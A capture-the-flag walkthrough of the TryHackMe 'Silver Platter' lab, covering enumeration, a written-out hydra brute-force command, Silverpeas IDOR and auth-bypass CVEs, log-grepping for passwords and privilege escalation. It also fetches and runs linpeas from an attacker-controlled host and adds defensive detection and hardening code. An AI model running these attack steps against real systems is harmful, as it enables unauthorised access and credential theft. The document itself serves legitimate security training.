# Silver Platter

{% embed url="https://tryhackme.com/room/silverplatter" %}

## Enumeration

### nmap

{% code fullWidth="false" %}

```bash
$ nmap [Target IP] -v -T5 -A -p-

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1b:1c:87:8a:fe:34:16:c9:f7:82:37:2b:10:8f:8b:f1 (ECDSA)
|_  256 26:6d:17:ed:83:9e:4f:2d:f6:cd:53:17:c8:80:3d:09 (ED25519)

80/tcp   open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Hack Smarter Security
|_http-server-header: nginx/1.18.0 (Ubuntu)

8080/tcp open  http-proxy
|_http-title: Error
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Wed, 26 Feb 2025 12:45:08 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SMBProgNeg, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Wed, 26 Feb 2025 12:45:05 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Wed, 26 Feb 2025 12:45:06 GMT
|_    <html><head><title>Error</title></head><body>404 - Not Found</body></html>
```

{% endcode %}

### SSH 22

Let's check SSH first.

```bash
$ ssh root@silverplatter.thm
root@silverplatter.thm's password:
```

* SSH uses password-based authentication.

### HTTP 80

#### Directory Searching ([dirsearch](https://github.com/maurosoria/dirsearch))

```bash
Target: http://silverplatter.thm/

[21:36:52] Starting:
[21:38:18] 403 -  564B  - /assets/
[21:38:18] 301 -  178B  - /assets  ->  http://silverplatter.thm/assets/
[21:39:09] 301 -  178B  - /images  ->  http://silverplatter.thm/images/
[21:39:09] 403 -  564B  - /images/
[21:39:20] 200 -   17KB - /LICENSE.txt
[21:39:58] 200 -  771B  - /README.txt
```

We can take a look at ***LICENSE.txt*** and ***README.txt***, but neither contains anything useful, so we can skip them for now.

### Web Feature

![info](/files/P18lic2Cgn0lLEl2TZbV)

* Here we get some crucial info. Software in use: **Silverpeas**. Username: **scr1ptkiddy**.

### HTTP 8080

<figure><img src="/files/OymvlK2I6of7aofMFUMl" alt=""><figcaption><p>Login page</p></figcaption></figure>

On port 8080 we find a login page. We already have a username, so we now need a way in, possibly by brute force.

Fortunately, the room's description gives us a clue: ***(they check it against the rockyou.txt wordlist - that's how 'cool' they are)***

#### CEWL (<https://www.kali.org/tools/cewl/>)

```bash
$ cewl [URL] > custom_passwords.txt
# scrape every word on the site into a custom wordlist
```

## Brute Forcing

### Hydra

* See more on: <https://www.kali.org/tools/hydra/> or use `man hydra`

{% code fullWidth="false" %}

```bash
$ hydra -l scr1ptkiddy -P ~/HTB-Labs/SilverPlatter/custompass.txt silverplatter.thm -s 8080 http-post-form "/silverpeas/AuthenticationServlet:Login=^USER^&Password=^PASS^&DomainId=0:Login or password incorrect" -V -t 4
#hydra -l [Username] -P [Password List] [Target Hostname] -s [Port] http-post-form "[Request URL Ending]:[Request-Body]:[Error Message for Invalid Login]"

RETURN:
[8080][http-post-form] host: silverplatter.thm   login: scr1ptkiddy   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
```

{% endcode %}
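From the defender's side, a run like the hydra command above leaves a recognisable footprint: a burst of POSTs to the login servlet from a single source. The following is an added example (my code, not from the room or the Silverpeas project) that flags such bursts in nginx access logs; the log lines are constructed, and the threshold and window are assumptions.

```python
"""Flag brute-force bursts against the Silverpeas login servlet in nginx access logs.
Added example: log lines are constructed, the path comes from the hydra command
in the walkthrough, and the threshold/window values are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/silverpeas/AuthenticationServlet"
# nginx "combined" format: ip - user [time] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])

def login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Map IP -> total login POSTs for every IP exceeding `threshold` POSTs to
    LOGIN_PATH inside any sliding `window`. Status codes are ignored on purpose:
    a failed form login may still be answered with 200, so the rate is the signal."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3].startswith(LOGIN_PATH):
            per_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window start forward
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged

# constructed sample: 12 POSTs in 12 seconds from one host, one normal login from another
SAMPLE = [
    f'10.10.14.5 - - [26/Feb/2025:12:50:{s:02d} +0000] "POST {LOGIN_PATH} HTTP/1.1" 200 812 "-" "Mozilla/5.0"'
    for s in range(12)
] + [
    f'10.10.14.9 - - [26/Feb/2025:12:50:03 +0000] "POST {LOGIN_PATH} HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
```

`login_bursts(SAMPLE)` returns `{'10.10.14.5': 12}`; the single legitimate login from 10.10.14.9 is not flagged.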

## Authentication Bypass

**CVE-2024-36042**: <https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d>

This is an alternative way in; it requires an intercepting proxy such as Burp Suite or Caido.

## IDOR

CVE-2023-47323: <https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2023-47323>

<figure><img src="/files/w1XIQzONfj7KEVqBmiqq" alt="" width="563"><figcaption></figcaption></figure>

Use Burp Suite to capture the request that fetches a mail by its ID; it should look like this:

<figure><img src="/files/p3RJnSgKhHLTZCDLgXZD" alt="" width="563"><figcaption></figcaption></figure>

Notice that the request carries an ID parameter that we can change to another value. Changing the ID to 5 returns the following message, which contains an SSH password.

<figure><img src="/files/aAZzVkKIT3uBT7wLE2Mc" alt="" width="563"><figcaption></figcaption></figure>
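To make the IDOR concrete from the application's side, here is an added example (my code, not Silverpeas code; the in-memory store, message contents and function names are constructed) of a message lookup that trusts the client-supplied ID next to one that checks the requester actually owns the message.

```python
"""Vulnerable vs. hardened message lookup, illustrating the IDOR class behind
CVE-2023-47323. Added example: the store and helper names are constructed."""
from dataclasses import dataclass
import logging

log = logging.getLogger("idor-demo")

@dataclass(frozen=True)
class Message:
    msg_id: int
    recipient: str
    body: str

# constructed store with sequential IDs, which is exactly what makes the parameter guessable
STORE = {
    4: Message(4, "scr1ptkiddy", "welcome to the team"),
    5: Message(5, "tim", "ssh credentials (constructed placeholder)"),
}

def read_message_vulnerable(requester: str, msg_id: int):
    """Trusts the client-supplied ID: any authenticated user can read any message."""
    return STORE.get(msg_id)

def read_message(requester: str, msg_id: int):
    """Hardened: the ID is honoured only if the message belongs to the requester.
    'Missing' and 'forbidden' look identical to the caller so IDs cannot be
    enumerated, while the denied attempt is logged for detection."""
    msg = STORE.get(msg_id)
    if msg is None or msg.recipient != requester:
        if msg is not None:
            log.warning("IDOR attempt: %s requested message %d owned by %s",
                        requester, msg_id, msg.recipient)
        return None
    return msg

def visible_ids(read, requester: str, id_range):
    """Which message IDs a requester can retrieve under a given implementation."""
    return [m.msg_id for i in id_range if (m := read(requester, i)) is not None]
```

With the vulnerable lookup, `visible_ids(read_message_vulnerable, "scr1ptkiddy", range(1, 10))` is `[4, 5]`; with the ownership check it is `[4]`.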

## SSH login

```bash
$ ssh tim@silverplatter.thm
tim@silverplatter.thm's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-91-generic x86_64)
...
tim@silver-platter:~$
tim@silver-platter:~$ ls
user.txt
```

After logging in we got our first flag!

## Post-Exploitation

### sudo Privileges (denied)

```bash
tim@silver-platter:~$ sudo su
[sudo] password for tim: 
tim is not in the sudoers file.  This incident will be reported.
```

### Group - ADM

```bash
tim@silver-platter:~$ id
uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)
```

Note the ***4(adm)*** at the very end of the output: tim is a member of the adm group, which we might need later.

### Users

```bash
tim@silver-platter:~$ cat /etc/passwd
...
tyler:x:1000:1000:root:/home/tyler:/bin/bash
...
```

We are looking for another user with a home directory under `/home/`, and we find **tyler**.

```bash
tim@silver-platter:~$ cd ..
tim@silver-platter:/home$ ls -la
total 16
drwxr-xr-x  4 root  root  4096 Dec 13  2023 .
drwxr-xr-x 19 root  root  4096 Dec 12  2023 ..
dr-xr-xr-x  2 root  root  4096 Dec 13  2023 tim
drwxr-x---  5 tyler tyler 4096 Dec 13  2023 tyler
```

### /var/log look through

Searching the logs is one way to find possible passwords; you could also try `cat /etc/shadow`, but that will most likely be denied.

```bash
tim@silver-platter:/var/log$ grep -ir "password"
# -i: case-insensitive match
# -r: recurse through the current directory (/var/log), readable thanks to the adm group
```

We find a `DB_password` value. Now we can check whether tyler reused it as his login password.

```bash
tim@silver-platter:/home$ su tyler
Password: 
tyler@silver-platter:
tyler@silver-platter:~$ sudo su
[sudo] password for tyler: 

root@silver-platter:/home/tyler# cd ~
root@silver-platter:~# ls
root.txt  snap  start_docker_containers.sh
root@silver-platter:~# cat root.txt
THM{REDACTED}#
```

We're in, and the password reuse is confirmed.

### Linpeas

Running linpeas is an alternative way to enumerate what may be exploitable on the host.

```bash
# HOST:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
python3 -m http.server 80

# TARGET:
wget http://[Attacker-IP]/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

